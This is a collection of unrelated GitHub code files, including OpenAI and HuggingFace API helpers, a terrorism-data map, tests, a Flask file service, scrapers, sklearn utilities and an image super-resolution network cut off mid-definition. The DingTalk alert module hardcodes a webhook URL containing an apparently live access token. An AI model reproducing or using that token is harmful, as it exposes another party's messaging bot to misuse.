+{"seq_id":"9662720858","text":"import os\nimport openai\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\n# Get prompt from command line argument\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('prompt', type=str, help='The prompt for the OpenAI API')\nargs = parser.parse_args()\n\nprint(args.prompt)\n\nresponse = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=args.prompt,\n temperature=0.7,\n max_tokens=256,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n)\n\nprint(response)\n","repo_name":"jakedowns/MyGPTApp","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"36838357156","text":"import pandas as pd\nimport folium\nfrom folium import plugins\nimport os\n \nstate_geo = os.path.join('.', 'us-states.json') # https://github.com/python-visualization/folium/blob/master/tests/us-states.json\n\ndataset = pd.read_csv('../datasets/longitudeFixed.csv')\n\nm = folium.Map(location=[25, 24], zoom_start=3,)\nfolium.TileLayer('openstreetmap').add_to(m)\nfolium.TileLayer('Stamen Terrain').add_to(m)\n\nplugins.Fullscreen(\n position='topright',\n title='Expand me',\n 
title_cancel='Exit me',\n force_separate_button=True\n).add_to(m)\n\nminimap = plugins.MiniMap()\nm.add_child(minimap)\n\n\ndict_states = {}\nfor index, row in dataset.iterrows():\n state = row['provstate']\n if state in dict_states:\n num = dict_states[state]\n dict_states[state] = num + 1\n else:\n dict_states[state] = 1\n\narray = []\nfor state, count in dict_states.items():\n array.append([state,count])\ndata_states_num_attacks = pd.DataFrame(array, columns = ['state', 'count'])\n\nbins = [0.0,58,116,174,232,290,348,406,464,579.0]\n\nfolium.Choropleth(\n geo_data=state_geo,\n name='States',\n data=data_states_num_attacks,\n columns=['state', 'count'],\n key_on='feature.properties.name',\n fill_color='YlGn',\n fill_opacity=0.7,\n line_opacity=0.2,\n legend_name='Number of attacks',\n bins=bins\n).add_to(m)\n\nfolium.LayerControl().add_to(m)\n \n# Save to html\nm.save('html_files/map_states.html')\n","repo_name":"FerranAgulloLopez/DataMiningGlobalTerrorism","sub_path":"second_delivery/map/map_states.py","file_name":"map_states.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"651589457","text":"import unittest\nimport os\nimport numpy as np\nfrom subprocess import call\n\nimport z5py\n\nfrom testClass import McLuigiTestCase\n\n\nclass TestDataTasks(McLuigiTestCase):\n\n @classmethod\n def setUpClass(cls):\n super(TestDataTasks, cls).setUpClass()\n call(['python', './executables/workflow.py', 'learn_rf'])\n\n @classmethod\n def tearDownClass(cls):\n super(TestDataTasks, cls).tearDownClass()\n\n def check_segmentation(self, res_path):\n self.assertTrue(os.path.exists(res_path))\n result = z5py.File(res_path, use_zarr_format=False)['data'][:]\n self.assertEqual(result.shape, self.expected_shape)\n clusters = np.unique(result)\n self.assertGreater(len(clusters), self.expected_shape[0])\n\n def test_multicut_wf(self):\n call(['python', './executables/workflow.py', 'mc'])\n seg_path = './cache/MulticutSegmentation_standard.h5'\n self.check_segmentation(seg_path)\n\n def test_blockwise_wf(self):\n call(['python', './executables/workflow.py', 'blockwise_mc'])\n seg_path = './cache/BlockwiseMulticutSegmentation_L1_20_256_256_5_50_50_standard.h5'\n self.check_segmentation(seg_path)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"constantinpape/mc_luigi","sub_path":"tests/unit_tests/test_workflow_tasks.py","file_name":"test_workflow_tasks.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28402250845","text":"from .directory.model import Directory\nfrom .file.model import File\nfrom .path.model import Path\nfrom .directory import service as ds\nfrom .file import service as fs\nfrom fs.osfs import OSFS\n\n\ndef mv(sor, tar, overwrite=True):\n if isinstance(sor, Directory):\n ds.mv(sor, tar, overwrite)\n else:\n fs.mv(sor, tar, overwrite)\n\n\ndef cp(sor, tar, overwrite=True):\n if isinstance(sor, Directory):\n ds.cp(sor, tar, overwrite)\n else:\n fs.cp(sor, tar, overwrite)\n\n\ndef rm(sor):\n if isinstance(sor, Directory):\n ds.rm(sor)\n else:\n fs.rm(sor)\n\n\nclass EnsureFS:\n def __init__(self, fs_or_path, default_filesystem=OSFS):\n if isinstance(fs_or_path, str):\n self.fs = default_filesystem(Path(fs_or_path).abs)\n self.need_close = True\n else:\n self.fs = fs_or_path\n self.need_close = False\n\n def __enter__(self):\n return self.fs\n\n def __exit__(self, type, value, 
trackback):\n if self.need_close:\n self.fs.close()\n\n\ndef launch_web_ui(host, port, version=0.1, debug=True):\n from flask import Flask, url_for\n from flask_cors import CORS, cross_origin\n from flask_restful import Api\n from .web import add_apis\n app = Flask(__name__)\n CORS(app)\n api = Api(app)\n add_apis(api, '/api/v{0}'.format(version))\n\n @app.route(\"/site-map\")\n def site_map():\n import json\n links = []\n for rule in app.url_map.iter_rules():\n if rule.endpoint == 'static':\n continue\n links.append(\n (url_for(rule.endpoint, path='%252Ftmp%252Ftest'), rule.endpoint))\n return json.dumps(links, indent=4, separators=(',', ':'))\n app.run(host, port, debug=debug)\n","repo_name":"Hong-Xiang/dxfs","sub_path":"src/python/dxl/fs/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26081644336","text":"from bs4 import BeautifulSoup\r\nfrom urllib.request import urlopen\r\n\r\n# with open(\"F:\\Programming Project Misc\\warner.html\") as fp:\r\n# soup = BeautifulSoup(fp, 'html.parser')\r\n\r\nsoup = BeautifulSoup(open(\"F:\\Programming Project Misc\\statguruinfo.html\"), 'html.parser')\r\n\r\nnames = soup.find('select', 'name=team')\r\n\r\n\r\n#seperate by select tag into a list\r\ndef extract_select_tags():\r\n select_tags = []\r\n for row in soup.find_all('select'):\r\n select_tags.append(row)\r\n return select_tags\r\n\r\nmyList = extract_select_tags()\r\n\r\n\r\n\r\n#remove html tags from a list of text\r\ndef remove_html_tags(text):\r\n \"\"\"Remove html tags from a string\"\"\"\r\n import re\r\n clean = re.compile('<.*?>')\r\n return re.sub(clean, '', text)\r\n\r\ncleanList = []\r\nfor text in myList:\r\n #append the text to a list\r\n cleanList.append(remove_html_tags(str(text)))\r\n\r\n\r\nlen(cleanList)\r\n\r\nfor text in cleanList:\r\n print(text)","repo_name":"edwarddhowarth/CricketStatDashboard","sub_path":"statguruinfoextractUtil.py","file_name":"statguruinfoextractUtil.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74504725306","text":"#i dont know if its right\n# her's 2,3 is diffrent and mine is diffrent , mine is 2nd row and 3rd column\n\n# 🚨 Don't change the code below\nrow1 = [\"1️\",\"2️\",\"3️\"]\nrow2 = [\"4️\",\"5️\",\"6️\"]\nrow3 = [\"7️\",\"8️\",\"9️\"]\nmap = [row1, row2, row3]\nprint(f\"{row1}\\n{row2}\\n{row3}\")\nposition = input(\"Where do you want to put the treasure?Enter positons , seprated \")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this row 👇\n\npos = position.split(\",\")\nif int(pos[0]) <=3 and int(pos[1]) <= 3:\n\n map[int(pos[0])-1][int(pos[1])-1] = \"X\"\n print(map[int(pos[0])-1][int(pos[1])-1])\n print(f\"{row1}\\n{row2}\\n{row3}\")\n\n\nelse:\n print(\"invalid input\")\n\n\n#Write your code above this row 👆\n\n# 🚨 Don't change the code below 👇\n#print(map)","repo_name":"yatin-kundra/python-udemy-code-","sub_path":"Beginner -- python -- 100 days/trasure-map(test-day4).py","file_name":"trasure-map(test-day4).py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16614614289","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n__author__ = 'qing.li'\n\"\"\"\nimport requests\n\nWEB_HOOK = 
'https://oapi.dingtalk.com/robot/send?access_token=382989c022d5fe882e9c6aa12e1f357b97176b4f4b429d32122dd7b888e5f5a4'\n\n\nclass Alert:\n    def __init__(self):\n        self.web_hook = WEB_HOOK\n        self.headers = {\n            'Content-Type': 'application/json; charset=utf-8',\n        }\n\n    def send_text(self, msg):\n        \"\"\"\n        DingTalk alert: send a text message\n        :param msg:\n        :return:\n        \"\"\"\n        data = {'msgtype': \"text\"}\n        if self._is_text_null(msg):\n            data['text'] = {'content': msg}\n        else:\n            raise ValueError(\"Message must not be empty\")\n        self._ding_post(data)\n\n    def _is_text_null(self, msg):\n        if not msg:\n            return False\n        else:\n            return True\n\n    def _ding_post(self, data):\n        \"\"\"\n        Send the message (content is UTF-8 encoded)\n        :param data: message data (dict)\n        \"\"\"\n        try:\n            response = requests.post(self.web_hook, headers=self.headers, json=data)\n\n        except requests.exceptions.HTTPError as exc:\n            print(\"Failed to send alert message, HTTP error: %d, reason: %s\" % (exc.response.status_code, exc.response.reason))\n\n        except requests.exceptions.ConnectionError:\n            print(\"Failed to send alert message, HTTP connection error!\")\n\n        else:\n            send_result = response.json()\n            if send_result['errcode']:\n                print(\"DingTalk bot message failed to send, reason: %s\" % send_result['errmsg'])\n\n","repo_name":"QingqinLi/mooc_ui_web","sub_path":"utils/alert.py","file_name":"alert.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"11960462436","text":"from abc import ABC, abstractmethod\n\nimport requests\nimport streamlit as st\n\n\nclass HuggingFaceTask(ABC):\n    \"\"\"Abstract class for HuggingFace tasks.\"\"\"\n\n    def __init__(self, name):\n        self.name = name\n        self.api_token = st.secrets[\"HF_API_KEY\"]\n        self.headers = {\"Authorization\": f\"Bearer {self.api_token}\"}\n        self.api_root = \"https://api-inference.huggingface.co/models/\"\n        self.api_url = None\n\n    @abstractmethod\n    def setup(self):\n        \"\"\"Abstract method.\"\"\"\n\n    @abstractmethod\n    def run(self):\n        \"\"\"Abstract method.\"\"\"\n\n\nclass HuggingFaceTaskMixin:\n    \"\"\"Mixin class.\"\"\"\n\n    def process_input(self, api_url, headers, text_lines, labels=None):\n        \"\"\"Query HF API.\"\"\"\n        output = []\n        for row in text_lines:\n            if labels is not None:\n                payload = {\n                    \"inputs\": row,\n                    \"parameters\": {\"candidate_labels\": labels},\n                    \"options\": {\"wait_for_model\": True},\n                }\n            else:\n                payload = {\n                    \"inputs\": row,\n                    \"options\": {\"wait_for_model\": True},\n                }\n\n            try:\n                response = requests.post(\n                    api_url, headers=headers, json=payload, timeout=10\n                )\n            except requests.exceptions.Timeout:\n                st.error(\"HTTP connection time out. 
Please try again!\", icon=\"🚨\")\n return []\n\n if response.status_code != 200:\n st.error(f\"Query error code: {response.status_code}\", icon=\"🚨\")\n st.error(response.text, icon=\"🚨\")\n return []\n\n output.append(response.json())\n\n st.success(\"Finished querying HuggingFace API successfully!\", icon=\"✅\")\n st.caption(\"\")\n\n return output\n\n def get_text(self, sample_input, max_lines):\n \"\"\"Get input text.\"\"\"\n input_text = st.text_area(\"Enter input keyphrases\", sample_input, height=150)\n\n text_lines = input_text.split(\"\\n\") # a list of lines\n text_lines = list(dict.fromkeys(text_lines)) # remove dubplicates and empty\n text_lines = list(filter(None, text_lines))\n\n if len(text_lines) > max_lines:\n st.info(f\"❄️ Only the first {max_lines} keyphrases are used.\")\n text_lines = text_lines[:max_lines]\n\n return text_lines\n","repo_name":"hvthaibk/huggingface_streamlit","sub_path":"src/hf_tasks.py","file_name":"hf_tasks.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22778022985","text":"# Importing the json, PyPDF2 \nimport json\nimport PyPDF2\nimport re\nwith open(\"The_Living_World.pdf\",'rb') as file: #you can always save the pdf file in same folder and check the rename\n pdf_reader=PyPDF2.PdfFileReader(file)\n entire_pdf=''\n # checking the range for all the pages and extract the test after reading all the texts\n for i in range(pdf_reader.numPages):\n entire_pdf=entire_pdf+pdf_reader.getPage(i).extractText()\n# regular expression\nregx=r'([0-9]+\\.[a-zA-Z\\s\\.\\?\\-\\/,\\(\\)______‘’\\[\\]&\\[AIPMT (Prelims)-2007\\]\\[NEET (Phase 2)-2016\\]NEET 2013:]+)\\(1\\)([a-zA-Z\\s\\-–,’\\'\\\";\\(\\)—“”0-9×&]+)\\(2\\)([a-zA-Z\\s\\-–,’\\'\\\";\\(\\)—“”0-9×&]+)\\(3\\)([a-zA-Z\\s\\-–,’\\'\\\";\\(\\)—“”0-9×&]+)\\(4\\)([a-zA-Z\\s\\-–,’\\'\\\";\\(\\)—“”0-9×&]+)Sol\\.Answer \\(([0-4])\\)'\n\nans=re.findall(regx,entire_pdf)\n\n# saving the results\nresult=[]\nfor i in range(len(ans)):\n temp=[]\n for j in range(6):\n temp.append(ans[i][j].replace('\\n',''))\n result.append(temp)\ndata=[]\nfor i in result:\n data.append({'question':i[0],'option1':i[1],'option2':i[2],'option3':i[3],'option4':i[4],'answer':i[5]})\n # saving the output results in the final.json file you can also rename this\nwith open('final.json','w') as outfile:\n json.dump(data,outfile,indent=4)\n # printing the results\nprint(result)\n","repo_name":"PappuKP/pdf_to_extract_que_ans","sub_path":"pdf_reader.py","file_name":"pdf_reader.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21247289364","text":"import pickle\nfrom typing import Dict, Union\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import f1_score, accuracy_score\n\nfrom src.entities.model_params import ModelParams\n\nClassifier = Union[LogisticRegression, RandomForestClassifier]\n\n\ndef train_model(\n features: pd.DataFrame, target: pd.Series, model_params: ModelParams,\n) -> Classifier:\n if model_params.model_type == \"LogisticRegression\":\n model = LogisticRegression(\n C=model_params.inv_regularization_strength,\n solver=\"liblinear\",\n intercept_scaling=model_params.intercept_scaling,\n )\n elif model_params.model_type == \"RandomForestClassifier\":\n model = RandomForestClassifier(\n 
n_estimators=model_params.n_estimators,\n            random_state=model_params.random_state,\n        )\n    else:\n        raise NotImplementedError()\n    model.fit(features, target)\n    return model\n\n\ndef predict_model(model: Classifier, features: pd.DataFrame) -> np.ndarray:\n    return model.predict(features)\n\n\ndef evaluate_model(preds: np.ndarray, target: pd.Series) -> Dict[str, float]:\n    return {\n        \"f1_score\": f1_score(target, preds),\n        \"acc_score\": accuracy_score(target, preds),\n    }\n\n\ndef dump_model(model: Classifier, output: str) -> str:\n    with open(output, \"wb\") as f:\n        pickle.dump(model, f)\n    return output\n\n\ndef load_model(input: str) -> Classifier:\n    with open(input, \"rb\") as f:\n        model = pickle.load(f)\n    return model\n","repo_name":"made-ml-in-prod-2021/truengineer","sub_path":"ml_project/src/models/model_fit_predict.py","file_name":"model_fit_predict.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"27023620470","text":"# -*- coding:utf-8 -*-\r\n# author Jin Weishi -*-\r\n\r\nfrom __future__ import absolute_import\r\nfrom __future__ import print_function\r\nfrom __future__ import division\r\n\r\nimport sys\r\nimport os\r\nsys.path.append(\"../\")\r\n\r\nfrom Tools.lib.config import config\r\nfrom Tools.lib.config import update_config\r\nfrom Tools.lib.models.seg_hrnet import get_seg_model\r\nfrom Tools.lib.datasets.cityscapes_cpu import Cityscapes\r\nfrom Tools.lib.utils.utils import get_world_size\r\nimport torch.distributed as dist\r\nfrom tqdm import tqdm\r\nfrom torch.nn import functional as F\r\n# sys.path.append(\"../\")\r\nimport tensorflow as tf\r\nimport cv2\r\nfrom osgeo import osr, gdal\r\n# import gdal\r\nimport warnings\r\nfrom data.io.image_preprocess import short_side_resize_for_inference_data\r\nfrom libs.configs import cfgs\r\nfrom libs.networks import build_whole_network,build_whole_network_WV\r\nfrom libs.box_utils import draw_box_in_img\r\nfrom help_utils import tools\r\nfrom warnings import simplefilter\r\nimport numpy as np\r\nimport math\r\nimport torch\r\nimport torch.nn as nn\r\nimport shutil\r\nfrom osgeo import gdal\r\nimport logging\r\nfrom collections import OrderedDict\r\nfrom torchvision.utils import make_grid\r\nfrom PIL import Image\r\nimport argparse\r\nimport time\r\nimport pandas as pd\r\nimport requests\r\n# Suppress warning messages\r\n# tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\r\n# box-drawing modes: 0 = no boxes, -1 = boxes only, -2 = boxes with scores\r\nNOT_DRAW_BOXES = 0\r\nONLY_DRAW_BOXES = -1\r\nONLY_DRAW_BOXES_WITH_SCORES = -2\r\nsimplefilter(action='ignore', category=FutureWarning)\r\nwarnings.filterwarnings('ignore')\r\n\r\n'''Basic deep-learning building blocks'''\r\n####################\r\n# Useful tools\r\n####################\r\ndef act(act_type, inplace=True, neg_slope=0.2, n_prelu=1):\r\n    # helper selecting activation\r\n    # neg_slope: for leakyrelu and init of prelu\r\n    # n_prelu: for p_relu num_parameters\r\n    act_type = act_type.lower()\r\n    if act_type == 'relu':\r\n        layer = nn.ReLU(inplace)\r\n    elif act_type == 'leakyrelu':\r\n        layer = nn.LeakyReLU(neg_slope, inplace)\r\n    elif act_type == 'prelu':\r\n        layer = nn.PReLU(num_parameters=n_prelu, init=neg_slope)\r\n    else:\r\n        raise NotImplementedError('activation layer [{:s}] is not found'.format(act_type))\r\n    return layer\r\ndef norm(norm_type, nc):\r\n    # helper selecting normalization layer\r\n    norm_type = norm_type.lower()\r\n    if norm_type == 'batch':\r\n        layer = nn.BatchNorm2d(nc, affine=True)\r\n    elif norm_type == 
'instance':\r\n layer = nn.InstanceNorm2d(nc, affine=False)\r\n else:\r\n raise NotImplementedError('normalization layer [{:s}] is not found'.format(norm_type))\r\n return layer\r\ndef addnoise_cn(x, use_gpu):\r\n if use_gpu:\r\n device=torch.device('cuda')\r\n else:\r\n device=torch.device('cpu')\r\n x = x.cpu()\r\n x = x.numpy()\r\n batchsize, d, m, n = x.shape\r\n x1 = np.zeros((batchsize, d + 1, m, n), dtype=x.dtype)\r\n x1[:, 0:d, :, :] = x\r\n for i in range(0, batchsize):\r\n x1[i, d, :, :] = np.random.random(size=(m, n))\r\n return torch.from_numpy(x1).to(device)\r\ndef addnoise(x, use_gpu):\r\n if use_gpu:\r\n device=torch.device('cuda')\r\n else:\r\n device=torch.device('cpu')\r\n x = x.cpu()\r\n x = x.numpy()\r\n n = np.random.random(size=x.shape)\r\n x = x + 0.1 * n\r\n return torch.from_numpy(x).to(device)\r\ndef pad(pad_type, padding):\r\n # helper selecting padding layer\r\n # if padding is 'zero', do by conv layers\r\n pad_type = pad_type.lower()\r\n if padding == 0:\r\n return None\r\n if pad_type == 'reflect':\r\n layer = nn.ReflectionPad2d(padding)\r\n elif pad_type == 'replicate':\r\n layer = nn.ReplicationPad2d(padding)\r\n else:\r\n raise NotImplementedError('padding layer [{:s}] is not implemented'.format(pad_type))\r\n return layer\r\ndef get_valid_padding(kernel_size, dilation):\r\n kernel_size = kernel_size + (kernel_size - 1) * (dilation - 1)\r\n padding = (kernel_size - 1) // 2\r\n return padding\r\nclass ConcatBlock(nn.Module):\r\n # Concat the output of a submodule to its input\r\n def __init__(self, submodule):\r\n super(ConcatBlock, self).__init__()\r\n self.sub = submodule\r\n\r\n def forward(self, x):\r\n output = torch.cat((x, self.sub(x)), dim=1)\r\n return output\r\n\r\n def __repr__(self):\r\n tmpstr = 'Identity .. \\n|'\r\n modstr = self.sub.__repr__().replace('\\n', '\\n|')\r\n tmpstr = tmpstr + modstr\r\n return tmpstr\r\nclass ShortcutBlock(nn.Module):\r\n # Elementwise sum the output of a submodule to its input\r\n def __init__(self, submodule):\r\n super(ShortcutBlock, self).__init__()\r\n self.sub = submodule\r\n\r\n def forward(self, x):\r\n output = x + self.sub(x)\r\n return output\r\n\r\n def __repr__(self):\r\n tmpstr = 'Identity + \\n|'\r\n modstr = self.sub.__repr__().replace('\\n', '\\n|')\r\n tmpstr = tmpstr + modstr\r\n return tmpstr\r\ndef sequential(*args):\r\n # Flatten Sequential. 
It unwraps nn.Sequential.\r\n    if len(args) == 1:\r\n        if isinstance(args[0], OrderedDict):\r\n            raise NotImplementedError('sequential does not support OrderedDict input.')\r\n        return args[0] # No sequential is needed.\r\n    modules = []\r\n    for module in args:\r\n        if isinstance(module, nn.Sequential):\r\n            for submodule in module.children():\r\n                modules.append(submodule)\r\n        elif isinstance(module, nn.Module):\r\n            modules.append(module)\r\n    return nn.Sequential(*modules)\r\ndef conv_block(in_nc, out_nc, kernel_size, stride=1, dilation=1, groups=1, bias=True, \\\r\n               pad_type='zero', norm_type=None, act_type='relu', mode='CNA'):\r\n    '''\r\n    Conv layer with padding, normalization, activation\r\n    mode: CNA --> Conv -> Norm -> Act\r\n        NAC --> Norm -> Act --> Conv (Identity Mappings in Deep Residual Networks, ECCV16)\r\n    '''\r\n    assert mode in ['CNA', 'NAC', 'CNAC'], 'Wrong conv mode [{:s}]'.format(mode)\r\n    padding = get_valid_padding(kernel_size, dilation)\r\n    p = pad(pad_type, padding) if pad_type and pad_type != 'zero' else None\r\n    padding = padding if pad_type == 'zero' else 0\r\n    c = nn.Conv2d(in_nc, out_nc, kernel_size=kernel_size, stride=stride, padding=padding, \\\r\n                  dilation=dilation, bias=bias, groups=groups)\r\n    a = act(act_type) if act_type else None\r\n    if 'CNA' in mode:\r\n        if norm_type == 'weight':\r\n            return c\r\n        else:\r\n            n = norm(norm_type, out_nc) if norm_type else None\r\n            return sequential(p, c, n, a)\r\n    elif mode == 'NAC':\r\n        if norm_type is None and act_type is not None:\r\n            a = act(act_type, inplace=False)\r\n            # Important!\r\n            # input----ReLU(inplace)----Conv--+----output\r\n            #        |________________________|\r\n            # inplace ReLU will modify the input, therefore wrong output\r\n        n = norm(norm_type, in_nc) if norm_type else None\r\n        return sequential(n, a, p, c)\r\n####################\r\n# Useful blocks\r\n####################\r\nclass ResNetBlock(nn.Module):\r\n    '''\r\n    ResNet Block, 3-3 style\r\n    with extra residual scaling used in EDSR\r\n    (Enhanced Deep Residual Networks for Single Image Super-Resolution, CVPRW 17)\r\n    '''\r\n\r\n    def __init__(self, in_nc, mid_nc, out_nc, kernel_size=3, stride=1, dilation=1, groups=1, \\\r\n            bias=True, pad_type='zero', norm_type=None, act_type='relu', mode='CNA', res_scale=1):\r\n        super(ResNetBlock, self).__init__()\r\n        conv0 = conv_block(in_nc, mid_nc, kernel_size, stride, dilation, groups, bias, pad_type, \\\r\n            norm_type, act_type, mode)\r\n        if mode == 'CNA':\r\n            act_type = None\r\n        if mode == 'CNAC':  # Residual path: |-CNAC-|\r\n            act_type = None\r\n            norm_type = None\r\n        conv1 = conv_block(mid_nc, out_nc, kernel_size, stride, dilation, groups, bias, pad_type, \\\r\n            norm_type, act_type, mode)\r\n        # if in_nc != out_nc:\r\n        #     self.project = conv_block(in_nc, out_nc, 1, stride, dilation, 1, bias, pad_type, \\\r\n        #         None, None)\r\n        #     print('Need a projector in ResNetBlock.')\r\n        # else:\r\n        #     self.project = lambda x:x\r\n        self.res = sequential(conv0, conv1)\r\n        self.res_scale = res_scale\r\n\r\n    def forward(self, x):\r\n        res = self.res(x).mul(self.res_scale)\r\n        return x + res\r\nclass ResNetBlock_wn(nn.Module):\r\n    '''\r\n    ResNet Block, 3-3 style\r\n    with extra residual scaling used in EDSR\r\n    (Enhanced Deep Residual Networks for Single Image Super-Resolution, CVPRW 17)\r\n    '''\r\n\r\n    def __init__(self, in_nc, mid_nc, out_nc, kernel_size=3, stride=1, dilation=1, groups=1, \\\r\n            bias=True, pad_type='zero', norm_type='weight', act_type='relu', mode='CNA', res_scale=1):\r\n        super(ResNetBlock_wn, self).__init__()\r\n\r\n        act_type = None\r\n        # 
norm_type = None\r\n # 定义基础卷积层0\r\n conv0 = conv_block(in_nc, mid_nc, kernel_size, stride, dilation, groups, bias, pad_type, \\\r\n norm_type, act_type, mode)\r\n # 定义基础卷积层1\r\n conv1 = conv_block(mid_nc, out_nc, kernel_size, stride, dilation, groups, bias, pad_type, \\\r\n norm_type, act_type, mode)\r\n # 定义激活层\r\n act = nn.ReLU(True)\r\n # 定义归一化函数\r\n wn = lambda x: torch.nn.utils.weight_norm(x)\r\n res = []\r\n res.append(\r\n wn(conv0)\r\n )\r\n res.append(act)\r\n res.append(wn(conv1))\r\n # if mode == 'CNA':\r\n # act_type = None\r\n # if mode == 'CNAC': # Residual path: |-CNAC-|\r\n # act_type = None\r\n # norm_type = None\r\n # conv1 = conv_block(mid_nc*3, out_nc/2, kernel_size, stride, dilation, groups, bias, pad_type, \\\r\n # norm_type, act_type, mode)\r\n # if in_nc != out_nc:\r\n # self.project = conv_block(in_nc, out_nc, 1, stride, dilation, 1, bias, pad_type, \\\r\n # None, None)\r\n # print('Need a projecter in ResNetBlock.')\r\n # else:\r\n # self.project = lambda x:x\r\n self.res = nn.Sequential(*res)\r\n self.res_scale = res_scale\r\n\r\n def forward(self, x):\r\n res = self.res(x).mul(self.res_scale)\r\n return x + res\r\n####################\r\n# Upsampler\r\n####################\r\ndef pixelshuffle_block(in_nc, out_nc, upscale_factor=2, kernel_size=3, stride=1, bias=True, \\\r\n pad_type='zero', norm_type=None, act_type='relu'):\r\n '''\r\n Pixel shuffle layer\r\n (Real-Time Single Image and Video Super-Resolution Using an Efficient Sub-Pixel Convolutional\r\n Neural Network, CVPR17)\r\n '''\r\n conv = conv_block(in_nc, out_nc * (upscale_factor ** 2), kernel_size, stride, bias=bias, \\\r\n pad_type=pad_type, norm_type=None, act_type=None)\r\n pixel_shuffle = nn.PixelShuffle(upscale_factor)\r\n\r\n n = norm(norm_type, out_nc) if norm_type else None\r\n a = act(act_type) if act_type else None\r\n return sequential(conv, pixel_shuffle, n, a)\r\ndef upconv_blcok(in_nc, out_nc, upscale_factor=2, kernel_size=3, stride=1, bias=True, \\\r\n pad_type='zero', norm_type=None, act_type='relu', mode='nearest'):\r\n # Up conv\r\n # described in https://distill.pub/2016/deconv-checkerboard/\r\n upsample = nn.Upsample(scale_factor=upscale_factor, mode=mode)\r\n conv = conv_block(in_nc, out_nc, kernel_size, stride, bias=bias, \\\r\n pad_type=pad_type, norm_type=norm_type, act_type=act_type)\r\n return sequential(upsample, conv)\r\n\r\n'''定义超分基础模型框架'''\r\n'''SRGAN'''\r\nclass SRResNet(nn.Module):\r\n def __init__(self, in_nc, out_nc, nf, nb, upscale=4, norm_type='batch', act_type='relu', \\\r\n mode='CAN', res_scale=1, upsample_mode='pixelshuffle'):\r\n super(SRResNet, self).__init__()\r\n n_upscale = int(math.log(upscale, 2))\r\n if upscale == 3:\r\n n_upscale = 1\r\n\r\n fea_conv = conv_block(in_nc, nf, kernel_size=3, norm_type=None, act_type=None)\r\n resnet_blocks = [ResNetBlock(nf, nf, nf, norm_type=norm_type, act_type=act_type,\\\r\n mode=mode, res_scale=res_scale) for _ in range(nb)]\r\n LR_conv = conv_block(nf, nf, kernel_size=3, norm_type=norm_type, act_type=None, mode=mode)\r\n\r\n if upsample_mode == 'upconv':\r\n upsample_block = upconv_blcok\r\n elif upsample_mode == 'pixelshuffle':\r\n upsample_block = pixelshuffle_block\r\n else:\r\n raise NotImplementedError('upsample mode [{:s}] is not found'.format(upsample_mode))\r\n if upscale == 3:\r\n upsampler = upsample_block(nf, nf, 3, act_type=act_type)\r\n else:\r\n upsampler = [upsample_block(nf, nf, act_type=act_type) for _ in range(n_upscale)]\r\n HR_conv0 = conv_block(nf, nf, kernel_size=3, norm_type=None, 
act_type=act_type)\r\n HR_conv1 = conv_block(nf, out_nc, kernel_size=3, norm_type=None, act_type=None)\r\n\r\n self.model = sequential(fea_conv, ShortcutBlock(sequential(*resnet_blocks, LR_conv)),\\\r\n *upsampler, HR_conv0, HR_conv1)\r\n\r\n def forward(self, x):\r\n x = self.model(x)\r\n return x\r\n'''SRGAN_Noise'''\r\nclass SRResNet_Noise(nn.Module):\r\n def __init__(self, in_nc, out_nc, nf, nb, upscale=4, norm_type='batch', act_type='relu', \\\r\n mode='CAN', res_scale=1, upsample_mode='pixelshuffle', use_gpu=True):\r\n super(SRResNet_Noise, self).__init__()\r\n self.use_gpu = use_gpu\r\n n_upscale = int(math.log(upscale, 2))\r\n if upscale == 3:\r\n n_upscale = 1\r\n\r\n fea_conv = conv_block(in_nc+1, nf, kernel_size=3, norm_type=None, act_type=None)\r\n resnet_blocks = [ResNetBlock(nf, nf, nf, norm_type=norm_type, act_type=act_type,\\\r\n mode=mode, res_scale=res_scale) for _ in range(nb)]\r\n LR_conv = conv_block(nf, nf, kernel_size=3, norm_type=norm_type, act_type=None, mode=mode)\r\n\r\n if upsample_mode == 'upconv':\r\n upsample_block = upconv_blcok\r\n elif upsample_mode == 'pixelshuffle':\r\n upsample_block = pixelshuffle_block\r\n else:\r\n raise NotImplementedError('upsample mode [{:s}] is not found'.format(upsample_mode))\r\n if upscale == 3:\r\n upsampler = upsample_block(nf, nf, 3, act_type=act_type)\r\n else:\r\n upsampler = [upsample_block(nf, nf, act_type=act_type) for _ in range(n_upscale)]\r\n HR_conv0 = conv_block(nf, nf, kernel_size=3, norm_type=None, act_type=act_type)\r\n HR_conv1 = conv_block(nf, out_nc, kernel_size=3, norm_type=None, act_type=None)\r\n\r\n self.model = sequential(fea_conv, 